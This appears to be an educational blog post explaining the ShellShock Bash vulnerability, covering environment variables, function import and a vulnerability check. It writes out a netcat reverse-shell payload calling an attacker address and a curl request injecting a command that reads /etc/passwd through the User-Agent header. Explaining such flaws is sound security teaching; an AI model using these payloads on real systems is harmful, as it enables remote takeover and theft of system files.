ShellShock
ShellShock is a vulnerability in the Bash shell (GNU Bash upto version 4.3) that allows Bash to execute unintentional commands from environment variables. Attackers can issue commands remotely on the target host with elevated privileges, resulting in complete takeover of the system.
Let us have a look at what environment variables are.
Environment variables are the variables specific to a certain environment, like a root user would have different environment variables than a normal user in a Linux system.
The env command prints out a list of all the environment variables for your login on to the screen. Some examples of environment variables are USER, HOME, SHELL, LANG etc. You can set an environment variable with export VARIABLE_NAME=variable_value. One point to note is that environment variables declared in this manner are valid only for the current bash session. In order to persist environment variables, you can define them in your .bashrc file. You could also print out specific env variables with the echo command, like echo $HOME.
ShellShock vulnerability is particularly dangerous due to the fact that a wide array of IoT smart devices like routers, webcams, home security systems etc. could potentially be targets to attacks. Applications like web and mail servers, DNS servers use bash to communicate with the underlying operating system, rendering them susceptible to attacks. ShellShock could also be used to launch DoS attacks on vulnerable servers.
Now, for details on how this vulnerability affects systems.
Bash scripting language supports functions, that contain pieces of code that can be reused. We can also store the functions so defined, in environment variables, which would let bash scripts export functions as environment variables and allow a sub-shell to use them. Let us break it down a bit.
You can define bash functions with the syntax greeting=() { echo "Hi dawns33ker"; } The vulnerability arises from how bash implemented importing functions stored in environment variables. Whenever a new shell is created, bash looks through the environment variables for functions and imports all the defined functions. This is done by simply removing the = and evaluating the result.
For example, the greetings function above would become greeting() { echo "Hi dawns33ker"}; Due to ShellShock, it is possible to exploit this behaviour by adding extra code to the end of the function definition.
Let us take the case of a function being defined as an environment variable. env X='() { :; }; echo "bash vulnerable"' bash -c :. This is a function which will determine if your version of bash is vulnerable to ShellShock. If vulnerable, the function will print the message bash vulnerable or else it prints nothing.
This function assignment consists of two commands. The first part is assigning the value X='() { :; }; echo "bash vulnerable"' to X. The value assigned to X is designed to exploit the ShellShock vulnerability, i.e chaining a command to the function definition, in this case the echo command. The second part i.e bash -c invokes a new bash shell with the command : which does nothing. That is to say that the first part of the payload () { :;}is a function that does nothing. The second part echo "bash vulnerable" which has been chained to the function definition is the malicious payload that will be executed when the function is imported.
As explained above, when the function is imported, the = is removed and the line X='() { :; }; echo "bash vulnerable" is passed to the bash interpreter. The ; is being a command separator, the definition of the X function and the malicious payload both are executed. The echo command would obviously be replaced by something more menacing, like spawning a reverse shell on the attacker PC, like, nc 10.10.11.1 4455 -e /bin/bash &' bash -c :. This example works by using netcat to open a bash session and redirect input and output to the attacker’s machine. The & operator means that the session is opened in the background and now the attacker has a shell on the vulnerable system.
ShellShock can be exploited by using HTTP requests to a vulnerable server. An attacker could craft a request like () { :; }; echo "PASSWD:" $(</etc/passwd) and send the request to the server with curl -H "User-Agent: () { :; }; echo "PASSWD:" $(</etc/passwd)" http://example.com/
References:
Exploit Code:
Apache mod_cgi - ‘Shellshock’ Remote Command Injection
dhclient 4.1 - Bash Environment Variable Command Injection (Shellshock)